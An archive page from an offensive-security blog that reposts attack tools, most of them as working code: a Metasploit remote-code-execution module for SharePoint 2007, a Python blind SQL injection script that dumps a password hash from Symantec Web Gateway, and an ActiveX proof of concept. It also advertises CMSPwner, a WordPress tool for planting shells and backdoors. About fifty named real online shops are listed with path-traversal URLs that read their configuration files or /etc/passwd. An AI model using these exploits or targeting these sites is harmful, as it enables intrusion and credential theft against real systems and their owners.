Computer Security Blog | Learning The Offensive Security: 2012-07-29

Aug 4, 2012

CMSPwner - PHP script For pwn cms

You can download the script from the Source.

#########

# Script Title: CMSPwner

# Version: 1.0 Beta

# Date: 02/08/12

# Script Author: Xt3mP

# Home: http://xt3mp.mx

# For: http://r00tw0rm.com

# Contact: xt3mp[at]null[dot]com

# User: Xt3mP

# Pass: root

# _____ _____ _____ _____

# | | | __| _ |_ _ _ ___ ___ ___

# | --| | | |__ | __| | | | | -_| _|

# |_____|_|_|_|_____|__| |_____|_|_|___|_|

#########

.+--==[0x00 - About]>.

CMSPwner is a PHP script created with the intention to take

completely any cms control. This version only have a Wordpress

module, and it's Beta version, so it's probably has errors.

-+--==[0x01 - Demostration]>.

URL: http://www.youtube.com/watch?v=Y8gqHpw4DMQ

.+--==[0x02 - Menu]>.

[+]Login

[-]Authentication: Requires user credentials (non wordpress).

[+]SQL data

[-]SQL Information: Option to take automatically the config in config.php file.

[+]Menu

[-]Home:

*Contains most important Wordpress information.

[-]Logout:

*Log out of the script.

[-]Self Remove:

*Delete completly the script.

[-]About:

*Contains information about the author.

[+]Admin

[-]Admin List:

*Contains all Administrators users with login, hash and mail.

[-]Reset Adm Pass:

*Module to reset any administrator user password.

[-]Add New Admin:

*Module to add a new administrator.

[+]Change Index

[-]Main [fopen]:

*Module to change -WORDPRESS MAIN INDEX- (not theme index).

[-]Theme [cURL]:

*Module to change -WORDPRESS THEME INDEX- (user credentials required).

[-]Theme [fopen]: Module to change -WORDPRESS THEME INDEX- (no user credentials required).

[+]Shell

[-]Upload:

*Module to upload shell.

[-]Make [themes]:

*Module to create shell in themes' path.

[-]Make [plugins]:

*Module to create shell in plugin' path.

[+]Backdoor

[-]Active Theme:

*Module to make a backdoor in any theme.

[-]Active Plugin:

*Module to make a backdoor in any plugin.

[>]Types:

*system(): Execute commands, example:

http://site/wp-content/x/file.php?active=true&cmd=ls

*File Downloader: Download file and make shell, example:

http://site/wp-content/x/file.php?

active=true&filename=SHELL.PHP&externalfile=http://web/shell.txt

.+--==[0x03 - Issues]>.

[+]Maybe you would have problems with permissions.

So, you can edit .htaccess or chmod file in question.

[+]Problem with magic_quotes and stripslashes, check what content you would post.

.+--==[0x04 - Source]>.

<?php

#########

# Script Title: CMSPwner v1 Wordpress Version

# Version: 1.0 Beta

# Date: 02/08/12

# Script Author: Xt3mP

# Home: http://xt3mp.mx

# For: http://r00tw0rm.com

# Contact: xt3mp[at]null[dot]com

# _____ _____ _____ _____

# | | | __| _ |_ _ _ ___ ___ ___

# | --| | | |__ | __| | | | | -_| _|

# |_____|_|_|_|_____|__| |_____|_|_|___|_|

#########

Source: http://pastebin.com/S61AxmWV

If you like my blog, Please Donate Me

Aug 1, 2012

Microsoft Office SharePoint Server 2007 Remote Code Execution

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
 Rank = ExcellentRanking

 include Msf::Exploit::Remote::Tcp
 include Msf::Exploit::EXE
 include Msf::Exploit::WbemExec

 def initialize
  super(
   'Name'        => 'Microsoft Office SharePoint Server 2007 Remote Code Execution',
   'Description'    => %q{
     This module exploits a vulnerability found in SharePoint Server 2007 SP2. The
    software contains a directory traversal, that allows a remote attacker to write
    arbitrary files to the filesystem, sending a specially crafted SOAP ConvertFile
    request to the Office Document Conversions Launcher Service, which results in code
    execution under the context of 'SYSTEM'.

    The module uses uses the Windows Management Instrumentation service to execute an
    arbitrary payload on vulnerable installations of SharePoint on Windows 2003 Servers.
    It has been successfully tested on Office SharePoint Server 2007 SP2 over Windows
    2003 SP2.
   },
   'Author'      => [
    'Oleksandr Mirosh', # Vulnerability Discovery and PoC
    'James Burton', # Vulnerability analysis published at "Entomology: A Case Study of Rare and Interesting Bugs"
    'juan' # Metasploit module
   ],
   'Platform'    => 'win',
   'References'  =>
    [
     [ 'CVE', '2010-3964' ],
     [ 'OSVDB', '69817' ],
     [ 'BID', '45264' ],
     [ 'MSB', 'MS10-104' ],
     [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-10-287/' ]
    ],
   'Targets'     =>
    [
     [ 'Microsoft Office SharePoint Server 2007 SP2 / Microsoft Windows Server 2003 SP2', { } ],
    ],
   'DefaultTarget'  => 0,
   'Privileged'     => true,
   'DisclosureDate' => 'Dec 14 2010'
  )

  register_options(
   [
    Opt::RPORT(8082),
    OptInt.new('DEPTH', [true, "Levels to reach base directory",7])
   ], self.class)
 end

 # Msf::Exploit::Remote::HttpClient is avoided because send_request_cgi doesn't get
 # the response maybe due to the 100 (Continue) status response even when the Expect
 # header isn't included in the request.
 def upload_file(file_name, contents)

  traversal = "..\\" * datastore['DEPTH']

  soap_convert_file = "<SOAP-ENV:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" "
  soap_convert_file << "xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" "
  soap_convert_file << "xmlns:SOAP-ENC=\"http://schemas.xmlsoap.org/soap/encoding/\" "
  soap_convert_file << "xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" "
  soap_convert_file << "xmlns:clr=\"http://schemas.microsoft.com/soap/encoding/clr/1.0\" "
  soap_convert_file << "SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">" << "\x0d\x0a"
  soap_convert_file << "<SOAP-ENV:Body>" << "\x0d\x0a"
  soap_convert_file << "<i2:ConvertFile id=\"ref-1\" "
  soap_convert_file << "xmlns:i2=\"http://schemas.microsoft.com/clr/nsassem/Microsoft.HtmlTrans.IDocumentConversionsLauncher/Microsoft.HtmlTrans.Interface\">" << "\x0d\x0a"
  soap_convert_file << "<launcherUri id=\"ref-3\">http://#{rhost}:8082/HtmlTrLauncher</launcherUri>" << "\x0d\x0a"
  soap_convert_file << "<appExe id=\"ref-4\"></appExe>" << "\x0d\x0a"
  soap_convert_file << "<convertFrom id=\"ref-5\">#{traversal}#{file_name}</convertFrom>" << "\x0d\x0a"
  soap_convert_file << "<convertTo id=\"ref-6\">html</convertTo>" << "\x0d\x0a"
  soap_convert_file << "<fileBits href=\"#ref-7\"/>" << "\x0d\x0a"
  soap_convert_file << "<taskName id=\"ref-8\">brochure_to_html</taskName>" << "\x0d\x0a"
  soap_convert_file << "<configInfo id=\"ref-9\"></configInfo>" << "\x0d\x0a"
  soap_convert_file << "<timeout>20</timeout>" << "\x0d\x0a"
  soap_convert_file << "<fReturnFileBits>true</fReturnFileBits>" << "\x0d\x0a"
  soap_convert_file << "</i2:ConvertFile>" << "\x0d\x0a"
  soap_convert_file << "<SOAP-ENC:Array id=\"ref-7\" xsi:type=\"SOAP-ENC:base64\">#{Rex::Text.encode_base64(contents)}</SOAP-ENC:Array>" << "\x0d\x0a"
  soap_convert_file << "</SOAP-ENV:Body>" << "\x0d\x0a"
  soap_convert_file << "</SOAP-ENV:Envelope>" << "\x0d\x0a"

  http_request = "POST /HtmlTrLauncher HTTP/1.1" << "\x0d\x0a"
  http_request << "User-Agent: Mozilla/4.0+(compatible; MSIE 6.0; Windows 5.2.3790.131072; MS .NET Remoting; MS .NET CLR 2.0.50727.42 )" << "\x0d\x0a"
  http_request << "Content-Type: text/xml; charset=\"utf-8\"" << "\x0d\x0a"
  http_request << "SOAPAction: \"http://schemas.microsoft.com/clr/nsassem/Microsoft.HtmlTrans.IDocumentConversionsLauncher/Microsoft.HtmlTrans.Interface#ConvertFile\"" << "\x0d\x0a"
  http_request << "Host: #{rhost}:#{rport}" << "\x0d\x0a"
  http_request << "Content-Length: #{soap_convert_file.length}" << "\x0d\x0a"
  http_request << "Connection: Keep-Alive" << "\x0d\x0a\x0d\x0a"

  connect
  sock.put(http_request << soap_convert_file)
  data = ""
  read_data = sock.get_once(-1, 1)
  while not read_data.nil?
   data << read_data
   read_data = sock.get_once(-1, 1)
  end
  disconnect
  return data
 end

 # The check tries to create a test file in the root
 def check

  peer = "#{rhost}:#{rport}"
  filename = rand_text_alpha(rand(10)+5) + '.txt'
  contents = rand_text_alpha(rand(10)+5)

  print_status("#{peer} - Sending HTTP ConvertFile Request to upload the test file #{filename}")
  res = upload_file(filename, contents)

  if res and res =~ /200 OK/ and res =~ /ConvertFileResponse/ and res =~ /<m_ce>CE_OTHER<\/m_ce>/
   return Exploit::CheckCode::Vulnerable
  else
   return Exploit::CheckCode::Safe
  end
 end

 def exploit

  peer = "#{rhost}:#{rport}"

  # Setup the necessary files to do the wbemexec trick
  exe_name = rand_text_alpha(rand(10)+5) + '.exe'
  exe      = generate_payload_exe
  mof_name = rand_text_alpha(rand(10)+5) + '.mof'
  mof      = generate_mof(mof_name, exe_name)

  print_status("#{peer} - Sending HTTP ConvertFile Request to upload the exe payload #{exe_name}")
  res = upload_file("WINDOWS\\system32\\#{exe_name}", exe)
  if res and res =~ /200 OK/ and res =~ /ConvertFileResponse/ and res =~ /<m_ce>CE_OTHER<\/m_ce>/
   print_good("#{peer} - #{exe_name} uploaded successfully")
  else
   print_error("#{peer} - Failed to upload #{exe_name}")
   return
  end

  print_status("#{peer} - Sending HTTP ConvertFile Request to upload the mof file #{mof_name}")
  res = upload_file("WINDOWS\\system32\\wbem\\mof\\#{mof_name}", mof)
  if res and res =~ /200 OK/ and res =~ /ConvertFileResponse/ and res =~ /<m_ce>CE_OTHER<\/m_ce>/
   print_good("#{peer} - #{mof_name} uploaded successfully")
  else
   print_error("#{peer} - Failed to upload #{mof_name}")
   return
  end

 end

end

Source: http://www.exploit-db.com/exploits/20122/

If you like my blog, Please Donate Me

Jul 31, 2012

List of osCommerce website that has vul. by Metropolist hacker

If you want to see full list, please go to the Source.

http://www.winkel.militariasales.com/extras/update.php?read_me=0&readme_file=../catalog/includes/configure.php

http://www.digitv-shop.ch/extras/update.php?read_me=0&readme_file=../catalog/includes/configure.php

http://www.essenceculinair.nl/extras/update.php?read_me=0&readme_file=../catalog/includes/configure.php

http://jfquad.fr/extras/update.php?read_me=0&readme_file=../catalog/includes/configure.php

http://www.eluth.com/extras/update.php?read_me=0&readme_file=../catalog/includes/configure.php

http://www.qpdistribution.com/extras/update.php?read_me=0&readme_file=../catalog/includes/configure.php

http://www.hoveylee.com/extras/update.php?read_me=0&readme_file=../catalog/includes/configure.php

http://g510.biz/extras/update.php?read_me=0&readme_file=../catalog/includes/configure.php

http://www.yazooy.com/extras/update.php?read_me=0&readme_file=../catalog/includes/configure.php

http://www.allstarcollectors.com/extras/update.php?read_me=0&readme_file=../catalog/includes/configure.php

http://artetimages.net/extras/update.php?read_me=0&readme_file=../catalog/includes/configure.php

http://www.kreativ-ideen.ch/extras/update.php?read_me=0&readme_file=../catalog/includes/configure.php

http://www.rs-autosport.net/extras/update.php?read_me=0&readme_file=../catalog/includes/configure.php

http://www.homecentre.ca/extras/update.php?read_me=0&readme_file=../catalog/includes/configure.php

http://www.awb.com/extras/update.php?read_me=0&readme_file=../catalog/includes/configure.php

http://www.xxapp.com/extras/update.php?read_me=0&readme_file=../catalog/includes/configure.php

http://www.poids-sauteurs.com/extras/update.php?read_me=0&readme_file=../catalog/includes/configure.php

http://www.providertackle.com/extras/update.php?read_me=0&readme_file=../catalog/includes/configure.php

http://www.bestvanilla.com/extras/update.php?read_me=0&readme_file=../catalog/includes/configure.php

http://www.rocketracingperformance.com/extras/update.php?read_me=0&readme_file=../catalog/includes/configure.php

http://www.yarnandmore.com/extras/update.php?read_me=0&readme_file=../catalog/includes/configure.php

http://www.dynaprointernational.com/extras/update.php?read_me=0&readme_file=../catalog/includes/configure.php

http://www.pjsparts.com/extras/update.php?read_me=0&readme_file=../catalog/includes/configure.php

http://www.vaillant-shop-4u.de/extras/update.php?read_me=0&readme_file=../catalog/includes/configure.php

http://www.monopoel.de/extras/update.php?read_me=0&readme_file=../catalog/includes/configure.php

http://www.daisychainclothing.co.uk/extras/update.php?read_me=0&readme_file=../catalog/includes/configure.php

http://www.wraptheoccasion.com/extras/update.php?read_me=0&readme_file=../catalog/includes/configure.php

http://theorangespider.com/extras/update.php?read_me=0&readme_file=../catalog/includes/configure.php

http://www.tanjas-power-shop.de/extras/update.php?read_me=0&readme_file=../catalog/includes/configure.php

http://www.visionpublicationsltd.com/extras/update.php?read_me=0&readme_file=../catalog/includes/configure.php

http://www.remorques-online.com/extras/update.php?read_me=0&readme_file=../catalog/includes/configure.php

http://shop.tykeoy.com/extras/update.php?read_me=0&readme_file=../catalog/includes/configure.php

http://www.lsm-autogas.de/extras/update.php?read_me=0&readme_file=../catalog/includes/configure.php

http://www.dogpawsonly.com/extras/update.php?read_me=0&readme_file=../catalog/includes/configure.php

http://www.fatherjohnhugo.com/extras/update.php?read_me=0&readme_file=../catalog/includes/configure.php

http://marcas-digitales.com/extras/update.php?read_me=0&readme_file=../catalog/includes/configure.php

http://www.dawnandracrafts.com.au/extras/update.php?read_me=0&readme_file=../catalog/includes/configure.php

http://www.fivestarmanufacturedhomes.com/extras/update.php?read_me=0&readme_file=../catalog/includes/configure.php

http://hamshop.jpn.org/extras/update.php?read_me=0&readme_file=../catalog/includes/configure.php

http://carrusaudio.com/extras/update.php?read_me=0&readme_file=../catalog/includes/configure.php

http://www.mustardseed.org.au/extras/update.php?read_me=0&readme_file=../catalog/includes/configure.php

http://www.mushroomharvest.com/extras/update.php?read_me=0&readme_file=../catalog/includes/configure.php

http://www.profacepaint.com/extras/update.php?read_me=0&readme_file=../catalog/includes/configure.php

http://www.packingboxes.com.au/extras/update.php?read_me=0&readme_file=../catalog/includes/configure.php

http://jujubeadz.com/extras/update.php?read_me=0&readme_file=../catalog/includes/configure.php

http://www.zollverein-touristik.de/extras/update.php?read_me=0&readme_file=../catalog/includes/configure.php

http://duckkingnewyork.com/extras/update.php?read_me=0&readme_file=../catalog/includes/configure.php

http://www.kreativ-ideen.ch/extras/update.php?read_me=0&readme_file=/etc/passwd

http://www.mybrazilianbikinis.com/extras/update.php?read_me=0&readme_file=/etc/passwd

http://www.rs-autosport.net/extras/update.php?read_me=0&readme_file=/etc/passwd

http://www.cassetom.fr/extras/update.php?read_me=0&readme_file=/etc/passwd

Source: http://pastebin.com/A8PmxR5C

If you like my blog, Please Donate Me

AxMan ActiveX fuzzing <== Memory Corruption PoC Crash(Uplay plugin from Ubisoft)

Your silly post reminded me of something, while on vacation recently I
bought a video game called "Assassin's Creed Revelations". I didn't have
much of a chance to play it, but it seems fun so far. However, I noticed the
installation procedure creates a browser plugin for it's accompanying uplay
launcher, which grants unexpectedly (at least to me) wide access to
websites.

I don't know if it's by design, but I thought I'd mention it here in case
someone else wants to look into it (I'm not really interested in video game
security, I air-gap the machine I use to play games). A few minutes in IDA
suggests this might work (untested):

x = document.createElement('OBJECT');
x.type = "application/x-uplaypc";
document.body.appendChild(x);
x.open("-orbit_product_id 1 -orbit_exe_path
QzpcV0lORE9XU1xTWVNURU0zMlxDQUxDLkVYRQ== -uplay_steam_mode -uplay_dev_mode
-uplay_dev_mode_auto_play")

$ printf "C:\\WINDOWS\\SYSTEM32\\CALC.EXE" | base64
QzpcV0lORE9XU1xTWVNURU0zMlxDQUxDLkVYRQ==

Source: http://seclists.org/fulldisclosure/2012/Jul/375

If you like my blog, Please Donate Me

Symantec Web Gateway 5.0.3.18(deptUploads_data.php) Blind SQL Injection Vulnerability

#!/usr/bin/python
# @_Kc57
# Blind SQLi POC
# Dumps out the first available hash in the users table of spywall_db

import urllib
import time
from time import sleep

timing='2.5'
checks = 0

def check_char(i, pos):
    global timimg
    global checks
    checks += 1
    url = 'https://192.168.200.132/spywall/includes/deptUploads_data.php?groupid=1 union select 1,2, IF (%s=conv(mid((select password from users),%s,1),16,10),SLEEP(%s),null);--' % (i,pos,timing)
    start = time.time()
    urllib.urlopen(url)
    end = time.time()
    howlong = end-start
    return howlong

def check_pos(pos):

    for m in range(0,16):
        output = check_char(m, pos)
        print "[*] Character %s - Took %s seconds" % (hex(m)[2:],output)
        if output > 2:
            return hex(m)[2:]


md5 = ''
start = time.time()
for y in range(1,33):
    print "Checking position %s" % (y)
    md5 += check_pos(y)
    print md5
    end = time.time()
    howlong = end-start

print "1st hash:%s" % (md5)
print "Found in %s queries" % (checks)
print "Found in %s" %(howlong)

# 1337day.com [2012-07-30]

Source: http://1337day.com/exploits/19078

If you like my blog, Please Donate Me

Jul 30, 2012

Windows – Open/Close Port With Windows Firewall Rule

Adds a new inbound firewall rule that filters traffic by allowing network packets that match the specified criteria.

- C:\Users\run>netsh advfirewall firewall add rule name="Open Port 80" dir=in action=allow protocol=TCP localport=80
OK. 
- C:\Users\run>

Removes an inbound firewall rule.

- C:\Users\run> netsh advfirewall firewall delete rule name="Open Port 80" protocol=TCP localport=80
  OK.
- C:\Users\run>

Source: http://www.megapanzer.com/2012/07/27/windows-openclose-port-with-windows-firewall-rule/

If you like my blog, Please Donate Me